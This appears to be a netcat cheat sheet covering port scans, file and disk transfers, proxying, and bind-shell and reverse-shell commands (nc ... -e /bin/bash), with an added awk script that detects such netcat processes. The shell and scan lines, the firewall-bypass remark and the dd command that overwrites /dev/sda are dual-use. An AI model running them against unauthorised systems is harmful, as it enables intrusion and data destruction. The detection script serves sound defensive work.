
Netcat

Getting Started

Usage

Connect to a host located anywhere

$ nc [options] [host] [port]

Listen for incoming connections

$ nc -lp port [host] [port]

Option examples

| Option | Example | Description |
|--------|---------|-------------|
| -h | nc -h | Help |
| -z | nc -z 192.168.1.9 1-100 | Port scan for a host or IP address |
| -v | nc -zv 192.168.1.9 1-100 | Provide verbose output |
| -n | nc -zn 192.168.1.9 1-100 | Fast scan by disabling DNS resolution |
| -l | nc -lp 8000 | TCP listen mode (for inbound connections) |
| -w | nc -w 180 192.168.1.9 8000 | Define timeout value |
| -k | nc -kl 8000 | Continue listening after disconnection |
| -u | nc -u 192.168.1.9 8000 | Use UDP instead of TCP |
| -q | nc -q 1 192.168.1.9 8000 | Client stays up after EOF |
| -4 | nc -4 -l 8000 | IPv4 only |
| -6 | nc -6 -l 8000 | IPv6 only |

Chat client-server

Server (192.168.1.9)

$ nc -lv 8000

Client

$ nc 192.168.1.9 8000

Netcat Examples

$ nc website.com 80
GET /index.html HTTP/1.1
HEAD / HTTP/1.1

or

$ echo "" | nc -zv -w1 192.168.1.1 801-805

Port scanning

Scan ports 21 through 25

$ nc -zvn 192.168.1.1 21-25

Scan ports 22, 3306 and 8080

$ nc -zvn 192.168.1.1 22 3306 8080

Proxy and port forwarding

$ nc -lp 8001 -c "nc 127.0.0.1 8000"

or

$ nc -l 8001 | nc 127.0.0.1 8000

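Create a tunnel from one local port to another. The -c form relays traffic in both directions; the plain pipe form only forwards data from port 8001 to port 8000.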

Download file

Server (192.168.1.9)

$ nc -lv 8000 < file.txt

Client

$ nc -nv 192.168.1.9 8000 > file.txt

Suppose you want to transfer a file “file.txt” from server A to client B.

Upload file

Server (192.168.1.9)

$ nc -lv 8000 > file.txt

Client

$ nc 192.168.1.9 8000 < file.txt

Suppose you want to transfer a file “file.txt” from client B to server A.

Directory transfer

Server (192.168.1.9)

$ tar -cvf - dir_name | nc -l 8000

Client

$ nc -n 192.168.1.9 8000 | tar -xvf -

Suppose you want to transfer a directory over the network from A to B.

Encrypt transfer

Server (192.168.1.9)

$ openssl enc -des3 -in file.txt -pass pass:password | nc -l 8000

Client

$ nc 192.168.1.9 8000 | openssl enc -des3 -d -pass pass:password -out file.txt

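Encrypt data before transferring it over the network. openssl enc provides confidentiality only (the ciphertext is not authenticated), 3DES (-des3) is a legacy cipher, and pass:password exposes the passphrase in the process list and shell history.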

Clones

Server (192.168.1.9)

$ dd if=/dev/sda | nc -l 8000

Client

$ nc -n 192.168.1.9 8000 | dd of=/dev/sda

Cloning a Linux PC is very simple. Suppose your system disk is /dev/sda. Note that the client command overwrites /dev/sda on the receiving machine.

Video streaming

Server (192.168.1.9)

$ cat video.avi | nc -l 8000

Client

$ nc 192.168.1.9 8000 | mplayer -vo x11 -cache 3000 -

Streaming video with netcat

Remote shell

Server (192.168.1.9)

$ nc -lv 8000 -e /bin/bash

Client

$ nc 192.168.1.9 8000

Remote shells are usually provided by telnet or ssh, but if those are not installed and we do not have permission to install them, a remote shell can also be created with netcat. The listener has no authentication or encryption, so anyone who can reach port 8000 gets the shell.

Reverse shell

Server (192.168.1.9)

$ nc -lv 8000

Client

$ nc 192.168.1.9 8000 -v -e /bin/bash

Reverse shells are often used to bypass firewall restrictions such as blocked inbound connections.
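
Added example (not part of the original cheat sheet): to find the remote shell and reverse shell commands above on a host you defend, this script classifies process command lines by whether netcat was started with -e or -c. The function names and the sample lines are constructed for illustration; real input would come from process-creation logs or ps -eo args=.

```shell
#!/bin/sh
# Added example: flag netcat processes that attach a program to the socket.
# Reads one command line per line on stdin (for instance from `ps -eo args=`).
# Prints "listen+exec <cmdline>"  for the remote shell pattern (-l with -e/-c)
# and    "connect+exec <cmdline>" for the reverse shell pattern (-e/-c, no -l).
classify_nc_exec() {
    awk '
    {
        exe = $1
        sub(/^.*\//, "", exe)            # drop any directory prefix
        if (exe != "nc" && exe != "ncat" && exe != "netcat") next
        listen = 0; hands_off = 0
        for (i = 2; i <= NF; i++) {
            # ncat long options
            if ($i == "--listen") listen = 1
            if ($i == "--exec" || $i == "--sh-exec") hands_off = 1
            # short options, possibly bundled (-lv, -lp, -lve)
            if ($i ~ /^-[A-Za-z0-9]+$/) {
                if ($i ~ /l/) listen = 1
                if ($i ~ /[ec]/) hands_off = 1
            }
        }
        if (hands_off) {
            kind = listen ? "listen+exec" : "connect+exec"
            print kind, $0
        }
    }'
}

# Constructed sample input: command lines taken from this page plus benign ones.
sample_process_lines() {
    cat <<'EOF'
/usr/bin/nc -lv 8000 -e /bin/bash
nc 192.168.1.9 8000 -v -e /bin/bash
nc -lp 8001 -c nc 127.0.0.1 8000
nc -zvn 192.168.1.1 21-25
nc -lv 8000
ncat --listen 8000 --exec /bin/sh
sshd: user@pts/0
EOF
}

sample_process_lines | classify_nc_exec
```

Some netcat builds give -c a meaning other than command execution, so treat -c hits as leads to confirm. The proxy command from this page is reported as listen+exec because it also hands a command to the socket.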